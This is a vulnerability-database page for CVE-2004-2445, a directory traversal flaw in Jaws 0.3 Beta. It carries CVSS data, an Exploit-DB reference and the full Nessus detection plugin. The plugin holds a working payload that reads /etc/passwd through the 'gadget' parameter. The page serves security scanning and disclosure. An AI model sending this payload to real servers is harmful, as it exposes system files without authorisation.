Vulnerabilities > CVE-2004-2445 - Input Validation vulnerability in Jaws 0.3Beta

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
jaws
nessus
exploit available

Summary

Directory traversal vulnerability in index.php in Jaws 0.3 BETA allows remote attackers to view arbitrary files via a .. (dot dot) in the gadget parameter.

Vulnerable Configurations

Part Description Count
Application
Jaws
1

Exploit-Db

descriptionJAWS 0.2/0.3 index.php gadget Parameter Traversal Arbitrary File Access. CVE-2004-2445. Webapps exploit for php platform
idEDB-ID:24255
last seen2016-02-02
modified2004-07-06
published2004-07-06
reporterFernando Quintero
sourcehttps://www.exploit-db.com/download/24255/
titleJAWS 0.2/0.3 index.php gadget Parameter Traversal Arbitrary File Access

Nessus

NASL familyCGI abuses
NASL idJAWS_MULTIPLE_FLAWS.NASL
descriptionThe remote web server is running JAWS, a content management system written in PHP. Input to the
last seen2020-06-01
modified2020-06-02
plugin id16198
published2005-01-18
reporterThis script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/16198
titleJAWS index.php gadget Parameter Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if(description)
{
 script_id(16198);
 script_cve_id("CVE-2004-2445");
 script_bugtraq_id(10670);

 script_version("1.18");
 script_name(english:"JAWS index.php gadget Parameter Traversal Arbitrary File Access");
 script_summary(english:"Checks for a file reading flaw in JAWS");
 
 script_set_attribute( attribute:"synopsis", value:
"A web application running on the remote host has a directory
traversal vulnerability." );
 script_set_attribute( attribute:"description", value:
"The remote web server is running JAWS, a content management system
written in PHP.

Input to the 'gadget' parameter of index.php is not properly
sanitized.  A remote attacker could exploit this to read potentially
sensitive data from the system.  This information could also be used
to mount further attacks.

This version of JAWS also reportedly has cross-site scripting and
authentication bypass vulnerabilities, though Nessus has not checked
for those issues." );
 script_set_attribute(attribute:"see_also",
   value:"https://seclists.org/fulldisclosure/2004/Jul/271");
 script_set_attribute(attribute:"solution", 
   value:"Upgrade to the latest version of this software." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/01/18");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/07/05");
 script_cvs_date("Date: 2018/11/15 20:50:17");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");

 exit(0);
}

# Check starts here

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80);

foreach dir ( cgi_dirs() )
{
 url = dir + '/index.php?gadget=../../../../../../etc/passwd%00&path=/etc';
 res = http_send_recv3(method:"GET", item:url, port:port);
 if (isnull(res)) exit(1, "The server didn't respond.");

 if ( egrep(pattern:"root:.*:0:[01]:.*:.*:", string:res[2]) )
 {
   res[2] = data_protection::redact_etc_passwd(output:res[2]);
   if (report_verbosity > 0)
   {
     report = string(
       "\nNessus detected this by requesting the following URL :\n\n",
       "  ", build_url(qs:url, port:port), "\n"
     );

     if (report_verbosity > 1)
       report += string("\nWhich yielded :\n\n", res[2], "\n");

     security_warning(port:port, extra:report);
   }
   else security_warning(port);

   exit(0);
 }
}